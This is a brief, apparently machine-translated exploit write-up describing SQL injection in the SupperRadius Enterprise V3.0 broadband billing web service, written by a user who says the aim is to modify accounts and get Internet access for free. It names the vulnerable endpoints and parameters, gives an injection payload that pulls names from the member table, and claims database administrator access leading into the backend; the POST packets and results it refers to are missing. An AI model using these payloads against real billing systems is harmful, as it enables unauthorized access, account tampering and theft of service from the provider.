SupperRadius enterprise V3.0 SQL injection vulnerability SupperRadius enterprise V3.0 SQL Injection Vulnerability
The broadband used for home Internet access happens to be charged with supperradius. An SQL injection vulnerability exists in web services of the Enterprise Edition, allowing you to query, delete, and modify accounts in the database to access the Internet for free :)
Access the following billing server address:
Http: // 192.168.1.1/GateWay/RosApi. asmx
CheckLoginUser and SetUserOffLine can inject SQL statements:
Http: // 192.168.1.1/GateWay/RosApi. asmx? Op = CheckLoginUser
Http: // 192.168.1.1/GateWay/RosApi. asmx? Op = SetUserOffLine
Copy the above two POST data packets to the burp suite for submission. The first is CheckLoginUser:
The userid and gid nodes in can be injected. The returned results are as follows:
The following queries the data in sr_ent_sysmember:
1' and 1 = (select top 1 name from sr_ent_sysmember )--
After the query is submitted, the page is obviously delayed, indicating that the current role is sa.
Use the account password to enter the background: